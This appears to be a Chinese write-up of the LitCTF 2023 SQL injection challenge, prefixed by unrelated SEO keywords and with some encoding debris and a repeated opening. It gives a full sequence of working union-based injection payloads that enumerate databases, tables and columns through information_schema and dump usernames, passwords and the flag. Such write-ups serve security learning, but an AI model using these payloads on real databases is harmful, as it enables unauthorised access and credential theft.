兰州企业网站制作,做淘宝客要有网站吗,一对一优势的网络营销方式,wordpress教程 微信[LitCTF 2023]这是什么#xff1f;SQL #xff01;注一下 #xff01; wp
题目描述#xff1a;为了安全起见多带了几个套罢了o(▽)q
页面内容#xff08;往下滑#xff09;#xff1a; SQL 语句已给出#xff0c;无非是更换了闭合方式。
先输个 1 试试#xff1a; …[LitCTF 2023]这是什么SQL 注一下 wp
题目描述为了安全起见多带了几个套罢了o(▽)q
页面内容往下滑 SQL 语句已给出无非是更换了闭合方式。
先输个 1 试试 在下面的回显中将 SQL 语句与执行结果都回显了出来。
测试闭合方式与注释符
假如闭合方式与注释符都正确那么输入以下内容应当与输入 1 得到一样的结果
1))))))--经过测试闭合方式为 )))))) 注释符为 -- 时可以正确执行。
group by 查询回显位数
1)))))) group by 2--经过测试回显位为两位。
输入
1)))))) union select 1,2--返回结果 经过测试两位都能正常回显。
查询当前数据库名
1)))))) union select 1,database()--返回结果 当前数据库名为 ctf 。
查询当前数据库中的所有表
1)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schemadatabase()--返回结果 只有一个 users 表。
查询表中的所有列
1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schemadatabase() and table_nameusers--返回结果 有三列分别是id,username,password
查询列中的所有内容
-1)))))) union select username,password from users--返回结果 fake_flag 意为 假的 flag 。可见这里面并没有 flag 。那么应该在其它数据库中。
select 查询所有数据库
使用 show 查询的时候不知道为什么出不来只好用 select 查询了。
-1)))))) union select 1,schema_name from information_schema.schemata--返回结果 除了 ctf 之外还有一个名为 ctftraining 的数据库。进去看看。
查询 ctftraining 数据库的所有表名、列名
查询 ctftraining 数据库的所有表名
-1)))))) union select 1,group_concat(table_name) from information_schema.tables where table_schemactftraining--返回结果 有一个名为 flag 的表。
查询 flag 表的所有列名
-1)))))) union select 1,group_concat(column_name) from information_schema.columns where table_schemactftraining and table_nameflag--返回结果 在 flag 表中有一个名为 flag 的列名。
查询 flag 列的所有内容
-1)))))) union select 1,flag from ctftraining.flag--返回结果 拿到 flag 。
